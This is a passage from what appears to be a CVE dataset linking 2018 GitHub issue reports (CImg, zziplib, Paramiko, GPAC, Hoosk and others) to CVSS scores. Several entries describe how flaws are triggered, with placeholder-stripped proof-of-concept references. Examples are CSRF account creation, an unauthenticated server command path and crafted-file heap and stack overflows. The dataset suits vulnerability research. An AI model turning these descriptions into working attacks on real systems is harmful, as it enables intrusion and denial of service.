  32273. "Issue_Created_At": "2018-02-23T02:44:40Z",
  32274. "description": "invalid free in APITAG (in input APITAG There is an invalid free in APITAG that leads to a Segmentation fault at sam2p NUMBERTAG A crafted input will lead to denial of service attack. Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32276. "severity": "CRITICAL",
  32277. "baseScore": 9.8,
  32278. "impactScore": 5.9,
  32279. "exploitabilityScore": 3.9
  32280. },
  32281. {
  32282. "CVE_ID": "CVE-2018-7588",
  32283. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/183",
  32284. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/183",
  32285. "Repo_new": "greyclab/cimg",
  32286. "Issue_Created_At": "2018-03-01T04:17:41Z",
  32287. "description": "a heap overflow when load a bmp image. a heap overflow occurs when load a crafted bmp image using cimg. the bug report as following with address sanitizer: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG f NUMBERTAG ff NUMBERTAG at pc NUMBERTAG dd NUMBERTAG bp NUMBERTAG ffee7a8e NUMBERTAG sp NUMBERTAG ffee7a8e NUMBERTAG READ of size NUMBERTAG at NUMBERTAG f NUMBERTAG ff NUMBERTAG thread T NUMBERTAG dd NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f NUMBERTAG bb8f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f NUMBERTAG ff NUMBERTAG is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ca NUMBERTAG b2 in operator APITAG long) ( PATHTAG NUMBERTAG fb6 in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::assign(unsigned int, unsigned int, unsigned int, unsigned int, unsigned char const&) APITAG NUMBERTAG a NUMBERTAG d in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG ff2af NUMBERTAG eb NUMBERTAG ff2af NUMBERTAG ec NUMBERTAG ff2af NUMBERTAG ed NUMBERTAG ff2af NUMBERTAG ee NUMBERTAG ff2af NUMBERTAG ef NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa]fa fa fa fa fa fa fa fa fa 
fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG ff2af NUMBERTAG f NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING the testcase please refer: URLTAG",
  32288. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32289. "severity": "HIGH",
  32290. "baseScore": 7.8,
  32291. "impactScore": 5.9,
  32292. "exploitabilityScore": 1.8
  32293. },
  32294. {
  32295. "CVE_ID": "CVE-2018-7589",
  32296. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/184",
  32297. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/184",
  32298. "Repo_new": "greyclab/cimg",
  32299. "Issue_Created_At": "2018-03-01T04:25:13Z",
  32300. "description": "double free when load bmp image. a double free when load a crafted image using cimg. the tested code commit is APITAG reports by the address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbc NUMBERTAG in _IO_default_finish ( PATHTAG NUMBERTAG f1be NUMBERTAG bd NUMBERTAG e in fclose ( PATHTAG NUMBERTAG f1be4f6f7cd in fclose ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ) APITAG NUMBERTAG b NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f1be NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbe3c in _IO_default_finish ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f1be4f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1be NUMBERTAG bd1d4 in _IO_file_doallocate ( PATHTAG ) SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING poc: URLTAG",
  32301. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32302. "severity": "HIGH",
  32303. "baseScore": 7.8,
  32304. "impactScore": 5.9,
  32305. "exploitabilityScore": 1.8
  32306. },
  32307. {
  32308. "CVE_ID": "CVE-2018-7590",
  32309. "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/45",
  32310. "Issue_Url_new": "https://github.com/havok89/hoosk/issues/45",
  32311. "Repo_new": "havok89/hoosk",
  32312. "Issue_Created_At": "2018-03-01T08:28:19Z",
  32313. "description": "CSRF issue that allow to attacker create an account. Hello. I want to report this CMS has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content CODETAG NUMBERTAG And account username = APITAG is created without admin user's intention.",
  32314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32315. "severity": "HIGH",
  32316. "baseScore": 8.8,
  32317. "impactScore": 5.9,
  32318. "exploitabilityScore": 2.8
  32319. },
  32320. {
  32321. "CVE_ID": "CVE-2018-7637",
  32322. "Issue_Url_old": "https://github.com/dtschump/CImg/issues/185",
  32323. "Issue_Url_new": "https://github.com/greyclab/cimg/issues/185",
  32324. "Repo_new": "greyclab/cimg",
  32325. "Issue_Created_At": "2018-03-02T03:40:55Z",
  32326. "description": "other testcases lead to heap overflow by loading crafted images. A heap overflow occurs at different location in APITAG when loading the crafted image file . the tested code commit is APITAG the reports with address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef9c at pc NUMBERTAG bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef9c thread T NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f injjj main PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef9c is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG f NUMBERTAG a6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f in APITAG int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG f4 in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9df NUMBERTAG fa fa 
fa fa NUMBERTAG fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING pocs : URLTAG URLTAG URLTAG URLTAG URLTAG",
  32327. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32328. "severity": "HIGH",
  32329. "baseScore": 7.8,
  32330. "impactScore": 5.9,
  32331. "exploitabilityScore": 1.8
  32332. },
  32333. {
  32334. "CVE_ID": "CVE-2018-7648",
  32335. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1088",
  32336. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1088",
  32337. "Repo_new": "uclouvain/openjpeg",
  32338. "Issue_Created_At": "2018-02-22T01:09:33Z",
  32339. "description": "sprintf buffer overflow. URLTAG Hello, it looks like this APITAG could overflow the buffer that is supplied for it. Thanks",
  32340. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32341. "severity": "CRITICAL",
  32342. "baseScore": 9.8,
  32343. "impactScore": 5.9,
  32344. "exploitabilityScore": 3.9
  32345. },
  32346. {
  32347. "CVE_ID": "CVE-2018-7652",
  32348. "Issue_Url_old": "https://github.com/dotse/zonemaster-gui/issues/217",
  32349. "Issue_Url_new": "https://github.com/zonemaster/zonemaster-gui--archived-old-version-not-to-be-used/issues/217",
  32350. "Repo_new": "zonemaster/zonemaster-gui--archived-old-version-not-to-be-used",
  32351. "Issue_Created_At": "2018-02-19T13:39:51Z",
  32352. "description": "Update GUI security. Update GUI for security reasons (escape HTML)",
  32353. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  32354. "severity": "MEDIUM",
  32355. "baseScore": 6.1,
  32356. "impactScore": 2.7,
  32357. "exploitabilityScore": 2.8
  32358. },
  32359. {
  32360. "CVE_ID": "CVE-2018-7662",
  32361. "Issue_Url_old": "https://github.com/CouchCMS/CouchCMS/issues/46",
  32362. "Issue_Url_new": "https://github.com/couchcms/couchcms/issues/46",
  32363. "Repo_new": "couchcms/couchcms",
  32364. "Issue_Created_At": "2018-03-04T06:15:02Z",
  32365. "description": "phpmailer.php and FILETAG leak disclosure the full path. Location: APITAG and APITAG Rows NUMBERTAG Harm: Web Site physical path leakage . FILETAG FILETAG",
  32366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  32367. "severity": "MEDIUM",
  32368. "baseScore": 5.3,
  32369. "impactScore": 1.4,
  32370. "exploitabilityScore": 3.9
  32371. },
  32372. {
  32373. "CVE_ID": "CVE-2018-7712",
  32374. "Issue_Url_old": "https://github.com/opencv/opencv/issues/10998",
  32375. "Issue_Url_new": "https://github.com/opencv/opencv/issues/10998",
  32376. "Repo_new": "opencv/opencv",
  32377. "Issue_Created_At": "2018-03-06T06:20:03Z",
  32378. "description": "assertion failure cause a denial of service . In some cases, an assertion failure may be intentional behavior, not a vulnerability, However, Assertion failure may cause denial of service attacks in some cases. And CVE IDs have been assigned such as CVETAG , CVETAG , CVETAG .",
  32379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  32380. "severity": "HIGH",
  32381. "baseScore": 7.5,
  32382. "impactScore": 3.6,
  32383. "exploitabilityScore": 3.9
  32384. },
  32385. {
  32386. "CVE_ID": "CVE-2018-7725",
  32387. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/39",
  32388. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/39",
  32389. "Repo_new": "gdraheim/zziplib",
  32390. "Issue_Created_At": "2018-03-06T01:56:42Z",
  32391. "description": "Invalid memory address dereference in zzip_disk_fread (in APITAG . Hi,it's a issues about the zziplib NUMBERTAG It crashed in function zzip_disk_fread.the details are below(ASAN): ./unzzip mem NUMBERTAG null p ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ffff7fec NUMBERTAG pc NUMBERTAG ffff5d NUMBERTAG bd bp NUMBERTAG e NUMBERTAG sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG ffff5d NUMBERTAG bc in inflate ( PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_disk_fread PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_mem_disk_fread PATHTAG NUMBERTAG in unzzip_mem_disk_cat_file PATHTAG NUMBERTAG ae8 in unzzip_cat PATHTAG NUMBERTAG f NUMBERTAG in unzzip_extract PATHTAG NUMBERTAG e3 in main PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG inflate NUMBERTAG ABORTING POC FILE: URLTAG",
  32392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32393. "severity": "MEDIUM",
  32394. "baseScore": 6.5,
  32395. "impactScore": 3.6,
  32396. "exploitabilityScore": 2.8
  32397. },
  32398. {
  32399. "CVE_ID": "CVE-2018-7726",
  32400. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/41",
  32401. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/41",
  32402. "Repo_new": "gdraheim/zziplib",
  32403. "Issue_Created_At": "2018-03-06T09:43:27Z",
  32404. "description": "Bus error in __zzip_parse_root_directory (in APITAG In APITAG NUMBERTAG there is a bus error caused by the __zzip_parse_root_directory function of zzip/zip.c. attackers could leverage this vulnerability to cause a denial of service via a crafted zip file. To reproduce the issue, run: ./zzdir $POC: ERRORTAG POC FILE: URLTAG",
  32405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32406. "severity": "MEDIUM",
  32407. "baseScore": 6.5,
  32408. "impactScore": 3.6,
  32409. "exploitabilityScore": 2.8
  32410. },
  32411. {
  32412. "CVE_ID": "CVE-2018-7727",
  32413. "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/40",
  32414. "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/40",
  32415. "Repo_new": "gdraheim/zziplib",
  32416. "Issue_Created_At": "2018-03-06T02:34:16Z",
  32417. "description": "There are memory leaks in zziplib NUMBERTAG which is trigged in zzip_mem_disk_new(in APITAG There are some memory leaks in zziplib which is trigged in function zzip_mem_disk_new(in APITAG Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
  32418. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  32419. "severity": "MEDIUM",
  32420. "baseScore": 6.5,
  32421. "impactScore": 3.6,
  32422. "exploitabilityScore": 2.8
  32423. },
  32424. {
  32425. "CVE_ID": "CVE-2018-7738",
  32426. "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/539",
  32427. "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/539",
  32428. "Repo_new": "util-linux/util-linux",
  32429. "Issue_Created_At": "2017-11-16T08:19:53Z",
  32430. "description": "Bash completion for umount fails if mount point contains a space. Arch Linux, util linux version NUMBERTAG For example, the mount point APITAG : $ cat /proc/mounts | grep media /dev/sdb1 PATHTAG vfat APITAG APITAG ro NUMBERTAG I type APITAG and it gets completed to APITAG . Maybe umount URLTAG should take a page from the book of bash completions URLTAG and parse APITAG , instead of mount output. (I originally thought this was a bug URLTAG in APITAG , until I realized that my distro replaces its umount completion in favour of that from APITAG .)",
  32431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  32432. "severity": "HIGH",
  32433. "baseScore": 7.8,
  32434. "impactScore": 5.9,
  32435. "exploitabilityScore": 1.8
  32436. },
  32437. {
  32438. "CVE_ID": "CVE-2018-7745",
  32439. "Issue_Url_old": "https://github.com/cobub/razor/issues/161",
  32440. "Issue_Url_new": "https://github.com/cobub/razor/issues/161",
  32441. "Repo_new": "cobub/razor",
  32442. "Issue_Created_At": "2018-03-07T15:37:38Z",
  32443. "description": "Some vulnerability NUMBERTAG create user without login Just update the url without login, the test user will be create. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG add data without login and execute evil code. Change the channel_id then Open html page even without APITAG admin access PATHTAG ,the evil code will execute. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG \" /> APITAG APITAG APITAG APITAG APITAG",
  32444. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  32445. "severity": "HIGH",
  32446. "baseScore": 7.5,
  32447. "impactScore": 3.6,
  32448. "exploitabilityScore": 3.9
  32449. },
  32450. {
  32451. "CVE_ID": "CVE-2018-7750",
  32452. "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1175",
  32453. "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1175",
  32454. "Repo_new": "paramiko/paramiko",
  32455. "Issue_Created_At": "2018-03-13T00:02:03Z",
  32456. "description": "Server implementation does not check for auth before serving later requests. What follows is a direct paste from a private gist used to workshop the issue a bit late last week; have completed tests/impl (from NUMBERTAG and will be pushing those shortly. (wanted the issue number set in stone APITAG We have a CVE for this issue: CVETAG . Intro Email from one Matthijs Kooijman ( MENTIONTAG URLTAG dated APITAG notes that Paramiko's server implementation may be connected to by clients that do not implement the auth step, and happily serves up commands/etc to such un authed clients. He found that APITAG (another Python lib that does not use Paramiko) has the same issue. Finally, he states the RFC is unclear as to whether this is purposeful. Let's double check both the RFCs and then our favorite reference implementation, APITAG Should neither provide a useful clue, my gut says the server implementation should track whether we've sent APITAG NUMBERTAG sure we already do track this) and default to rejecting any connection level messages (like APITAG or APITAG ) unless that flag is True. RFC scan tl;dr it is indeed kinda vague, there are two kinda disagreeing undercurrents, neither of which are ironclad: It is _assumed_ that the connection protocol (which is where command exec occurs) runs on top of / after setting up, the transport (initial PATHTAG ) and auth (user auth) protocols. The specific server implementation, and/or operator of an instantiation of such an implementation, has _significant leeway_ in how they implement and/or configure the server, re: when and how user auth occurs. Specifics: RFC NUMBERTAG protocol arch NUMBERTAG URLTAG : pretty clear that the intent is that a user auth step always occurs, followed by a service request: > The client sends a service request once a secure transport layer > connection has been established. A second service request is sent after > user authentication is complete. 
FILETAG : third bullet point re: policy issues that 'SHOULD' be addressed, highlights that auth specifics are up to the site/operator: > The authentication methods that are to be required by the server for > each user. The server's policy MAY require multiple authentication for > some or all users. The required algorithms MAY depend on the location > from where the user is trying to gain access. FILETAG : this whole section arguably applies, but it's very vague. However it _seems_ to back up my hunch that at core, this is up to the server implementer and/or operator, e.g: > At the discretion of the implementers, this default policy may be along > the lines of anything goes where there are no restrictions placed upon > users ...] RFC NUMBERTAG auth protocol NUMBERTAG URLTAG : more vague implications that the server can do whatever it wants, e.g. the below quote about none auth implies the authors at least partly considered servers that intentionally don't care about auth at all (though the specific discussion is about the actual, explicit use of the none auth type message, which is distinct from \"did not submit auth at all\"): > The \"none\" method is reserved, and MUST NOT be listed as supported. > However, it MAY be sent by the client. The server MUST always reject > this request, unless the client is to be granted access without any > authentication, in which case, the server MUST accept this request. FILETAG : this (like NUMBERTAG states that the server should start up the requested service after sending auth success. One could read this to imply that services SHOULD NOT start UNLESS auth has occurred, but it's not explicit NUMBERTAG URLTAG : notes that implementations MUST implement public key auth, though I note this is distinct from requiring that it is _enabled_ (clearly, many real servers only offer password auth, for example.) 
RFC NUMBERTAG transport protocol NUMBERTAG URLTAG : implies client may request \"a service\" after initial (high level) kex, where that service is one of userauth or connection. The transport level of the protocol thus doesn't appear to actually care or enforce that one performs auth before connection. RFC NUMBERTAG connection protocol NUMBERTAG URLTAG : once again implies that connection is \"designed to\" occur after/on top of auth NUMBERTAG URLTAG : again, it's 'assumed': > This protocol is assumed to run on top of a secure, authenticated > transport. User authentication and protection against network level > attacks are assumed to be provided by the underlying protocols. APITAG implementation My old friend and the only C codebase I have any familiarity with whatsoever, openssh portable URLTAG ... Synopsis After all the below, the tl;dr seems to be: APITAG sets up a dispatch table to determine how it responds to protocol messages/packets This table gets reinitialized depending on 'phase' of execution: while awaiting auth, it is only set to respond to auth related messages, then after successful auth, it retools the table to only respond to post auth related messages like channel opens. Thus, the case under test ends up being a simple APITAG even are you talking about? What's a channel open?\" ERRORTAG style situation no auth step, no idea how to handle anything beyond auth. Deep dive Main SSH2 server loop is APITAG > APITAG Which uses a dispatch table to handle inbound messages: URLTAG Which dispatches to other functions, so when it sees eg APITAG it calls APITAG : URLTAG Which is defined here: URLTAG If the user is asking for command exec, that's channel type session : URLTAG Which calls APITAG : URLTAG Which calls APITAG with a handle on APITAG : URLTAG This is our first apparent reference to anything auth related so far... 
The only other apparent external context is the ssh object used to get the actual channel in play on the call prior: URLTAG That auth context object is extern 'd at top of file: URLTAG We'll dig into that later if necessary but for now, let's assume it has handy ways of telling whether the user is authed or not, and the question is whether/how those are consulted. APITAG is, bizarrely, defined in APITAG : URLTAG It checks for APITAG (or a null password entry) and gets mad if not true: URLTAG So yea, we gotta doublecheck what that APITAG member actually maps to. Authctxt struct is defined in APITAG here: URLTAG It has a bunch of flags, of which success , authenticated , and valid all seem relevant. success is not documented; authenticated sounds like it maps to, well, authentication (user is who they claim to be) with valid mapping to (a generic level of) authorization (the user is actually allowed to login.) Those flags (esp valid ) aren't set in too many places; the most useful and in retrospect most obvious place is in handling of userauth requests: URLTAG The core of this is actually use of Authmethod structs ( format defined here URLTAG created by the various APITAG modules (one for each implemented auth backend kerberos, password, publickey, hostbased, etc) These are simple name , userauth , enabled structures, with userauth being a pointer to an implementation function (so e.g. 
the one for password auth is referencing APITAG in APITAG ( here URLTAG The per method userauth func is called and the result stored as authenticated var: URLTAG Which bubbles down (after much state machine checking) to finalizing userauth sending the success network message, updating APITAG , etc: URLTAG The APITAG flag seems to actually just be \"is the requested username a valid local system user\": URLTAG Note use of getpwnamallow , which (basically) wraps the syscall getpwnam aka \"get password entry for user\" (so APITAG is specifically that structure and not just a password) Which explains why it's distinct from success and authenticated . Initial distillation Seems at first that \"huh, the user can get a session as long as they exist locally, without necessarily passing auth\" which would be bad but would also act like Paramiko. However, realized: that APITAG flag is set by APITAG , meaning the client has to actually submit auth in order to set it. APITAG APITAG .) So if a user attempts to send a channel open request without authing, both APITAG and APITAG will be null, and thus APITAG should call line NUMBERTAG URLTAG and thus result in APITAG . Testing with live APITAG server Proving this with a live install is interesting: Ran local docker container executing Ubuntu + APITAG NUMBERTAG on port NUMBERTAG with nothing but root password auth by default Executed Matthijs's APITAG with nothing but the port number changed Did not get expected no user for session but instead seem to have just confused the poor thing: ERRORTAG Second dive The above protocol error log message comes out of here: URLTAG in ERRORTAG Which is stuffed into newly initialized dispatch tables by ssh_dispatch_init URLTAG Which is done via APITAG here: URLTAG So the tl;dr is that the dispatch table gets all NUMBERTAG slots filled initially by ERRORTAG , then the table is filled in with what is intended to be responded to (e.g. 
in APITAG , the very next line is to say \"ok and now respond to service requests\" URLTAG E.g. slot NUMBERTAG corresponds to APITAG , aka what our test client was requesting: FILETAG Looks like in the normal flow of things, the post auth process ends up reinitializing the dispatch table with acceptable messages (including channel opens): Server loop emits APITAG interactive session\" log message one can see in a successful regular auth+shell: URLTAG Then calls APITAG : URLTAG Which does aforementioned dispatch reset & fill in: URLTAG End result The RFC isn't terrifically clear beyond \"well, we kind of assume you're not gonna open channels and such unless you've already authed\", but it's not a SHOULD or a MUST . APITAG has chosen to implement this as a strict \"only respond to the messages you can handle at the current stage\" setup, where auth comes before connection (as in the RFC.) Trying to do things out of order results in a simple ERRORTAG . Paramiko does not do things quite that way: instead, as one might guess from the bug description, it simply sets up all possible dispatch targets (anything implemented by the Transport across its two handler tables, and the APITAG handler table) and then dispatches depending on message type: URLTAG Doing nothing certainly seems like a bad idea: this is clearly a massive security flaw, and the only reason I did all the above investigation is because software has an irritating history of \"but I was _relying_ on that bug / looseness in the spec / whatever!\". Given the main reference implementation disallows it, I'm inclined to assume nobody could possibly rely on this. So there's two obvious fixes for Paramiko: The APITAG is the Bible\" approach: update Transport's dispatching to be more like APITAG and only enable certain message types depending on the state of APITAG (which, impressively, appears to only ever be used in APITAG ...!!!) 
This could be problematic given that Transport is frustratingly bimodal and is used both for server _and_ client operations we'd have to make sure that we're not preventing a not yet authed client from dispatching on necessary responses because it's not authed yet, for example. Of note, APITAG is taking this approach in their fix, and are simply leveraging the fact that RFC NUMBERTAG compatible protocol numbers mean one can just go \"is the message identifier greater than the highest possible auth related number? Are you authed yet? No? Screw off!\" seems possible on our end, though doesn't really change the previous point about ensuring client side cases are protected. The \"that's too much work right now\" approach: simply rub some more references to APITAG and/or APITAG in specific spots such as APITAG ( here URLTAG Except this, too, is problematic because of how Transport, Server and APITAG split up responsibilities & exposures to one another. By default a Server has no direct access to the Transport running it, or that Transport's APITAG (which, in server mode, is set up during rekeying [including initial kex].) Changing this would be backwards incompatible (e.g. enforcing an actual APITAG on Server subclasses for the passing in of a reference to one of the other objects, since right now Server doesn't even define one!) though I would like to examine it sometime. Now probably not the best time though. Could still put specific, small scoped changes in Transport though, such as around the APITAG calls here: URLTAG My gut says to take a quick stab at the NUMBERTAG st approach but to fall back to the NUMBERTAG nd if the NUMBERTAG st cannot be done relatively painlessly. Either way, re: the actual action to take seems poorly defined, but esp given APITAG simply spits out a bunch of question marks and not a \"useful\" error; the RFCs NUMBERTAG list only NUMBERTAG default 'error' types, of which APITAG seems the closest fit. 
And indeed Paramiko uses it for eg bogus channel types, in some legacy tests.",
  32457. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  32458. "severity": "CRITICAL",
  32459. "baseScore": 9.8,
  32460. "impactScore": 5.9,
  32461. "exploitabilityScore": 3.9
  32462. },
  32463. {
  32464. "CVE_ID": "CVE-2018-7752",
  32465. "Issue_Url_old": "https://github.com/gpac/gpac/issues/997",
  32466. "Issue_Url_new": "https://github.com/gpac/gpac/issues/997",
  32467. "Repo_new": "gpac/gpac",
  32468. "Issue_Created_At": "2018-02-26T09:11:01Z",
  32469. "description": "Stack buffer overflow in avc_parsers.c. The stack buffer overflow occurs here URLTAG : APITAG I don't know exactly how APITAG works, but it seems to return a APITAG . The size of APITAG is only NUMBERTAG entries, so we can get this to overflow. The sps variable is a stack variable that comes from a parent function, for example in APITAG . Using this bug, I can craft an MP4 file that can overwrite anything above this variable in the stack, such as other fields in APITAG , stack variables, etc.",
  32470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  32471. "severity": "HIGH",
  32472. "baseScore": 7.8,
  32473. "impactScore": 5.9,
